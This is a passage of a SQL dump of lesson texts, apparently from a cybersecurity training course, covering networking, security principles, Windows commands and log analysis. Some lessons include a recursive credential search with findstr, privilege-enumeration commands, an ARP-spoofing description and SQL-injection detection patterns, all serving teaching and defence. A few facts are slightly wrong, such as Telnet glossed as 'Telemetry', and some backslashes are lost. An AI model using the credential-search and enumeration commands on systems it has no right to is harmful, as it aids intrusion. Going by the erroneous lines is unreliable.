(CIDR)\nSplitting a network into smaller chunks.\n* `/24` (Subnet Mask `255.255.255.0`):\n * First 3 octets match (`192.168.1.x`).\n * Only the last octet changes.\n * **Hosts**: 254 usable IPs (`1-254`).\n* `/16` (Mask `255.255.0.0`):\n * **Hosts**: 65,534.\n* `/32`: A single IP.\n\n**Calculation**:\nNumber of IPs = $2^{(32 - CIDR)}$.\n* `/30` = $2^2$ = 4 IPs. (Minus Network and Broadcast = 2 usable). Used for Router-to-Router links.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'), (419, 25, '## Subnetting Cheat Sheet\n\nCalculating subnets is a core skill for certifications (Network+, CCNA).\n\n### The Magic Number Method\nFind the \"Interesting Octet\" (The one where the mask is not 0 or 255).\n\n**Scenario**: Network `192.168.10.0 /26`.\n1. **Prefix**: /26.\n2. **Octet**: 26 is in the 4th octet (24 + 2).\n3. **Mask**: /26 means `11000000` in binary.\n * `128 + 64 = 192`. So Mask is `255.255.255.192`.\n4. **Block Size**: 256 - Mask (192) = **64**.\n\nThis means networks jump by 64.\n* Subnet 1: `192.168.10.0` - `192.168.10.63`\n* Subnet 2: `192.168.10.64` - `192.168.10.127`\n* Subnet 3: `192.168.10.128` - `192.168.10.191`\n* Subnet 4: `192.168.10.192` - `192.168.10.255`\n\n### Usable Hosts\nFormula: `Block Size - 2`.\n* Take Subnet 1: Range 0-63.\n* **0** is Network Address.\n* **63** is Broadcast Address.\n* **Usable**: 1-62.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'), (420, 26, '## DNS (Domain Name System)\n\nDNS turns human names (`google.com`) into computer IPs (`142.250.72.14`).\n\n### The DNS Hierarchy\n1. **Root Hints (.)**: The 13 root servers worldwide. They know who handles `.com`, `.org`, etc.\n2. **TLD (Top Level Domain)**: The `.com` servers. They know who handles `google.com`.\n3. **Authoritative Name Server**: Google\'s actual server. It knows the IP.\n\n### The Resolution Process\nYou type `google.com`.\n1. **PC**: Checks local cache / HOSTS file.\n2. **Recursive Resolver (ISP/8.8.8.8)**: \"I don\'t know. I\'ll ask Root.\"\n3. **Root**: \"I don\'t know, ask .COM server.\"\n4. **.COM**: \"I don\'t know, ask ns1.google.com.\"\n5. **ns1.google.com**: \"I know! It is 1.2.3.4.\"\n6. **Resolver**: Caches it and gives it to PC.\n\n### Record Types\n* **A**: IPv4.\n* **AAAA**: IPv6.\n* **MX**: Mail Server.\n* **CNAME**: Alias.\n* **PTR**: Reverse DNS (IP -> Name). Used for email filtering.\n* **TXT**: Arbitrary text (SPF/DMARC).', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'), (421, 27, '## DHCP and ARP\n\nHow you join a network.\n\n### DHCP (Dynamic Host Configuration Protocol)\nAutomates assigning IPs.\n**The DORA Process**:\n1. **Discover**: Client shouts (Broadcast): \"IS ANY DHCP SERVER HERE?\"\n2. **Offer**: Server says: \"I can give you IP `192.168.1.100`\".\n3. **Request**: Client says: \"I will take it!\"\n4. **Acknowledge**: Server says: \"It yours for 24 hours.\"\n\n### ARP (Address Resolution Protocol)\nMaps IP (Logic) to MAC (Physical).\n* Switch knows MACs. Router knows IPs.\n* When you ping `192.168.1.5` on a LAN:\n 1. PC checks ARP Table: \"Do I know the MAC for 192.168.1.5?\"\n 2. If No: Broadcast \"WHO HAS 192.168.1.5? TELL 192.168.1.2\".\n 3. Device replies \"I have it! My MAC is AA:BB:CC...\".\n 4. PC sends frame to AA:BB:CC.\n\n**ARP Spoofing (Man in the Middle)**:\nHacker replies \"I am 192.168.1.5!\" to the PC, and \"I am the Router!\" to the Gateway. Now all traffic flows through the Hacker.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'), (422, 28, '## Common Protocols & Ports\n\nMemorize these.\n\n| Port | Protocol | Service | Secure? |\n|---|---|---|---|\n| **20/21** | FTP | File Transfer | No (Cleartext) |\n| **22** | SSH | Secure Shell (Remote Linux) | **Yes** |\n| **23** | Telnet | Telemetry (Remote CLI) | No (Cleartext) |\n| **25** | SMTP | Email Sending | No (Use 587) |\n| **53** | DNS | Domain Name System | No (DNSSEC exists) |\n| **80** | HTTP | Web Traffic | No |\n| **443** | HTTPS | Encrypted Web Traffic | **Yes** (TLS) |\n| **110** | POP3 | Email Retrieval | No |\n| **143** | IMAP | Email Retrieval | No |\n| **3389** | RDP | Remote Desktop (Windows) | Yes |\n| **445** | SMB | Windows File Share | No (v1/v2 vulnerable) |\n\n### Traffic Analysis\n* **Cleartext** protocols (HTTP, Telnet, FTP) show passwords in Wireshark.\n* **Encrypted** protocols (HTTPS, SSH) show garbage characters.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'), (424, 30, '# Scenario: The Suspicious Login\n\n**Background**: You are a SOC Analyst. You received an alert about \"Cleartext Credentials\" on the network. You open the PCAP file in Wireshark.\n\n## Investigation Data\n* **Packet 12**: Protocol: HTTP. Source: 192.168.1.105. Dest: 104.21.55.2.\n* **Info**: POST /login.php HTTP/1.1\n* **Packet 12 Details**:\n * Form item: \"username\" = \"admin\"\n * Form item: \"password\" = \"SuperSecret123\"\n\n## Analysis\n1. The user logged into a website using **HTTP**, not HTTPS.\n2. Because it was HTTP, the data was sent in **Plaintext**.\n3. Anyone on the same WiFi could have captured this packet and stolen the credentials.\n\n## Mitigation\n* Always enforce **HTTPS** (TLS/SSL).\n* Use certificate pinning.\n* Educate users to look for the \"Padlock\" icon.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-26 20:53:36'), (425, 31, '# Final Module Quiz\n\nReview the key concepts from this module:\n* OSI Layers & TCP/IP\n* IP Addressing & Subnets\n* Common Protocols (SSH, HTTP, DNS)\n* Packet Analysis Basics\n\nYou are now ready to tackle real-world networking scenarios.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-26 20:53:36'), (434, 40, '## The CIA Triad\n\nThe cornerstone of Information Security. Every decision balances these three.\n\n1. **Confidentiality**: Keeping secrets secret.\n * **Goal**: Only authorized people can read data.\n * **Tools**: Encryption (AES), Access Control Lists (ACLs), Steganography.\n * **Failure**: Data Breach (Equifax).\n2. **Integrity**: Trusting the data.\n * **Goal**: Data has not been tampered with.\n * **Tools**: Hashing (SHA256), Digital Signatures.\n * **Failure**: An attacker changing a bank transfer from $10 to $10,000.\n3. **Availability**: Accessing the data.\n * **Goal**: Systems are up and running.\n * **Tools**: Redundancy (RAID), Backups, Load Balancers.\n * **Failure**: DDOS Attack, Ransomware (Encrypting files makes them unavailable).\n\n### The Balancing Act\nYou cannot have 100% of all three.\n* To make a system perfectly Confidential (unplug internet), you hurt Availability.\n* To make it perfectly Available (Open wifi), you hurt Confidentiality.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'); INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES (435, 41, '## Authentication (AuthN)\n\n\"Who are you?\"\n\n### The Three Factors\n1. **Type 1: Something you Know**: Password, PIN, Mother\'s Maiden Name.\n * *Weakness*: Can be guessed or phished.\n2. **Type 2: Something you Have**: Smart Card, Phone (SMS Code), YubiKey.\n * *Weakness*: Can be stolen or lost.\n3. **Type 3: Something you Are**: Biometrics (Fingerprint, Retina, FaceID).\n * *Weakness*: Privacy concerns. You can\'t reset your face if it is compromised.\n\n### MFA (Multi-Factor Authentication)\nCombining two *different* factors.\n* Password + PIN = **NOT MFA** (Both are Type 1).\n* Password + SMS Code = **MFA** (Type 1 + Type 2).\n* **Impact**: MFA stops 99.9% of automated account takeovers.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'), (436, 42, '## Authorization (AuthZ)\n\n\"What are you allowed to do?\"\n(AuthN happens first, then AuthZ).\n\n### Models\n1. **DAC (Discretionary Access Control)**:\n * The owner decides. (Windows/Linux file permissions).\n * \"I created this file, I let Bob read it.\"\n2. **MAC (Mandatory Access Control)**:\n * The System decides based on labels. (Military).\n * \"User is SECRET. File is TOP SECRET. User cannot read.\"\n3. **RBAC (Role Based Access Control)**:\n * Access based on job function. (Corporate).\n * \"Bob is in HR Group. HR Group can read Payroll.\" (Best for scaling).\n4. **ABAC (Attribute Based)**:\n * \"User can read file IF location=Office AND time=9am-5pm.\" (Zero Trust).', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'), (437, 43, '## Accounting (Non-Repudiation)\n\n\"What did you do?\"\nTracking user actions to ensure accountability.\n\n### Logging\n* **Who**: user `jsmith`.\n* **What**: Accessed `salary_database.db`.\n* **When**: `2024-12-25 04:00:00`.\n* **Where**: From IP `10.5.5.5`.\n\n### Non-Repudiation\nProof that someone did something so they cannot deny it later.\n* **Digital Signatures**: If I sign an email with my Private Key, I cannot claim \"I didn\'t write that\", because only I have the key.\n* **Audit Trails**: Logs sent to a central SIEM that users cannot delete.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'), (438, 44, '## Encryption Basics\n\nTurning \"Plaintext\" into \"Ciphertext\".\n\n### Symmetric Encryption (Shared Key)\n* **Concept**: Same key locks and unlocks.\n* **Algorithms**: AES (Advanced Encryption Standard), DES (Legacy), 3DES.\n* **Pros**: Fast. Good for large data (Hard Drives, Zip files).\n* **Cons**: Key Distribution problem. How do I send you the key securely?\n\n### Asymmetric Encryption (Public Key)\n* **Concept**: Key Pair.\n * **Public Key**: You give to everyone. Encrypts data.\n * **Private Key**: You accept. Decrypts data.\n* **Algorithms**: RSA, ECC (Elliptic Curve).\n* **Pros**: Secure key exchange.\n* **Cons**: Slow. CPU intensive.\n\n### Hybrid Encryption (HTTPS/TLS)\nWe use Asymmetric to exchange the key, then Symmetric to transfer the data. best of both worlds.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'), (439, 45, '## Hashing vs Encryption\n\nThey are often confused but are opposite concepts.\n\n| Feature | Encryption | Hashing |\n|---|---|---|\n| **Reversible?** | **YES** (with key). | **NO** (One-way). |\n| **Purpose** | Confidentiality. | Integrity. |\n| **Output Size** | Variable (Depends on input). | Fixed (e.g., 256 bits). |\n| **Examples** | AES, RSA. | SHA-256, MD5. |\n\n### Hashing Use Cases\n1. **Password Storage**: Never save passwords as text. Save the hash. When user logs in, hash their input and compare it to the database.\n2. **File Integrity**: Download a file. Check its MD5. If it matches the website, the file involves no corruption or malware injection.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'), (440, 46, '## Defense in Depth (Layered Security)\n\nDo not rely on one wall. If the wall fails, you lose. Use multiple layers.\nThe \"Onion\" approach.\n\n### The Layers\n1. **Policies/User**: Training, Strong Passwords.\n2. **Physical**: Locks, Cameras, Guards.\n3. **Perimeter**: Firewall, DMZ.\n4. **Network**: VLANs, NAC (Network Access Control).\n5. **Host**: Antivirus, EDR, Patching.\n6. **Application**: Secure Code, Input Validation.\n7. **Data**: Encryption, ACLs.\n\n### Example\nA hacker wants your database.\n1. **Firewall** blocks their port scan. (Layer 3).\n2. They Phish a user. **Email Filter** misses it.\n3. User clicks link. **EDR** detects the malware download and blocks it. (Layer 5).\n**Defense in Depth worked**.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'), (441, 47, '# Final Module Quiz\n\nProve your mastery of Security Principles.\nTopics:\n* CIA Triad (Confidentiality, Integrity, Availability)\n* AAA (AuthN, AuthZ, Accounting)\n* Encryption & Hashing\n* Defense in Depth\n\nGood luck!', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-26 20:58:02'), (447, 48, '## Windows CLI Navigation\n\nThe Command Prompt (`cmd.exe`) is the legacy shell, but still essential.\n\n### Directories\n* `dir`: List files (Like `ls` in Linux).\n* `cd`: Change directory.\n * `cd Desktop`\n * `cd ..` (Up one level).\n * `cd ` (Back to C: root).\n* `d:`: Switch to D drive. (Just type the letter).\n\n### Files\n* `type file.txt`: Read a file (Like `cat`).\n* `del file.txt`: Delete.\n* `copy file.txt backup.txt`: Copy.\n* `move file.txt folder`: Move.\n* `ren file.txt new.txt`: Rename.\n\n### Tips\n* **Tab Completion**: Type `cd Des` and hit Tab.\n* **cls**: Clear screen.\n* **help [command]**: `help dir`.', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'), (448, 49, '## Advanced File Reading\n\n### Searching\n* `findstr`: The Windows grep.\n * `findstr \"password\" config.txt`: Search for string.\n * `findstr /S /I \"password\" *.txt`: Recursive (/S) and Case-Insensitive (/I) search in all text files.\n\n### Redirection\n* `>`: Overwrite. `echo hello > file.txt`.\n* `>>`: Append. `echo world >> file.txt`.\n* `|`: Pipe. `type log.txt | findstr \"error\"`.\n\n### Attributes\nFiles can be Hidden.\n* `attrib`: Show attributes.\n* `attrib +h file.txt`: Hide it.\n* `attrib -h file.txt`: Unhide it.', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'), (449, 50, '## Who am I?\n\nEnumerating the host you are on.\n\n### Commands\n1. `hostname`: Computer Name.\n2. `whoami`: Current user (`DOMAINUser`).\n * `whoami /priv`: Show my privileges (Look for *SeDebugPrivilege*).\n * `whoami /groups`: Show my groups (Look for *Administrators*).\n3. `systeminfo`: Huge dump of OS version, Hotfixes (Patches), and Domain.\n * *Hack*: `systeminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\"`', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'), (450, 51, '## Network Configuration\n\n### Ipconfig\n* `ipconfig`: IP, Subnet Mask, Gateway.\n* `ipconfig /all`: + MAC Address, DNS Servers, DHCP info.\n* `ipconfig /release` & `ipconfig /renew`: Refresh DHCP.\n* `ipconfig /flushdns`: Clear DNS cache.\n\n### Ping & Tracert\n* `ping google.com`: Test connectivity. (Uses ICMP).\n* `tracert google.com`: Trace the hops to the destination. (Shows which routers you pass through).\n\n### Netstat\nNetwork Statistics.\n* `netstat -an`: Show all open ports and connections.\n* `netstat -ano`: Show PIDs (So you can kill the process using the port).', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'), (451, 52, '## Tasklist & Taskkill\n\nManaging processes from CLI.\n\n### Tasklist\n* `tasklist`: Lists all running processes and PIDs.\n* `tasklist /svc`: Shows which **Service** creates the process. (Great for `svchost.exe`).\n* `tasklist /m`: Lists DLLs used by each process.\n\n### Taskkill\n* `taskkill /PID 1234`: Kill by ID.\n* `taskkill /IM notepad.exe`: Kill by Image Name.\n* `taskkill /F /IM notepad.exe`: **Force** kill. (Like `kill -9`).', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'), (460, 54, '## Anatomy of a Log: Reading the Matrix\n\nA log is just a text record of \"Software doing something\".\n\n### The 3 Pillars of Observability\n1. **Logs**: Discrete events (The error happened at 2:01 PM).\n2. **Metrics**: Aggregated numbers (CPU usage was 80%).\n3. **Traces**: The journey of a request across services.\n\n### Common Log Formats\n* **Syslog (The Standard)**: `Dec 29 10:00:00 hostname sshd[1234]: Failed password for root from 1.2.3.4`.\n* **JSON (The Modern)**: `{\"timestamp\": \"2025-12-29T10:00:00\", \"host\": \"web01\", \"level\": \"ERROR\"}`.\n* **CEF (Common Event Format)**: Used by ArcSight. `CEF:0|Vendor|Product|Version|ID|Name|Sev|Extension`.\n\n### Why Analysts Hate Unstructured Logs\nIf a developer logs: `Error: Something bad happened.`\n* It tells you **nothing**.\n* A good log answers: **Who? What? Where? When?**\n\n### The Timestamp Problem\n* **Timezones**: Is the log in UTC or EST? If you correlate a UTC firewall log with an EST server log, you will be 5 hours off, and you will miss the attack.\n* **Rule**: Always set servers to UTC.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 16:31:02'), (461, 55, '## SSH Authentication Logs\n\nThe most attacked service on the internet.\n\n### /var/log/auth.log (or secure)\nIf you open a Linux server to the internet on Port 22, you will see this 5 seconds later:\n\n* **Failed Password**:\n `Invalid user admin from 192.168.1.5`\n `Failed password for invalid user admin from 192.168.1.5 port 22 ssh2`\n * This is a Dictionary Attack (Brute Force).\n\n* **Successful Login**:\n `Accepted password for root from 192.168.1.5 port 22 ssh2`\n `pam_unix(sshd:session): session opened for user root`\n * **Alert**: If you see this from a strange IP -> **Immediate Incident**.\n\n### Public Key Auth (The Secure Way)\n`Accepted publickey for root from 1.2.3.4...`\n* This means they used an SSH Key file (`id_rsa`), not a password.\n* It is much harder to brute force.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 16:31:03'), (462, 56, '## Web Access Logs (Apache/Nginx)\n\nFormat: `IP - User - Date - \"Request\" - Status - Bytes - Referrer - UserAgent`\n\n### Status Codes\n* **200 OK**: Request succeeded. (The page loaded).\n* **301/302 Redirection**: Moved.\n* **404 Not Found**: Client requested junk.\n * *Security Note*: High volume of 404s suggests a **Fuzzing/Dirbusting** attack (Looking for hidden files).\n* **403 Forbidden**: Access Denied.\n* **500 Internal Server Error**: The server crashed.\n * *Security Note*: A 500 often means an Exploit (SQLi or RCE) broke the application logic. Investigate 500s!', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'), (463, 57, '## Windows Logs (Security)\n\nFocus on **Event ID 4624 (Logon Success)** and **4625 (Failure)**.\n\n### Logon Types\nThe key field in Event 4624.\n* **Type 2**: Interactive. (Someone sat at the keyboard).\n* **Type 3**: Network. (Someone accessed a Shared Folder or mapped a drive).\n * *Note*: Psexec uses Type 3.\n* **Type 10**: RemoteDesktop. (RDP).\n * *Note*: The source IP is logged here. Crucial for tracking RDP attacks.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'), (464, 58, '## Detecting Web Attacks via Logs\n\n### SQL Injection (SQLi)\nLook for SQL syntax in the URL/URI.\n* `UNION SELECT`\n* `OR 1=1`\n* `%27` (Single Quote encoded).\n\n### Cross Site Scripting (XSS)\nLook for HTML/JS tags.\n* `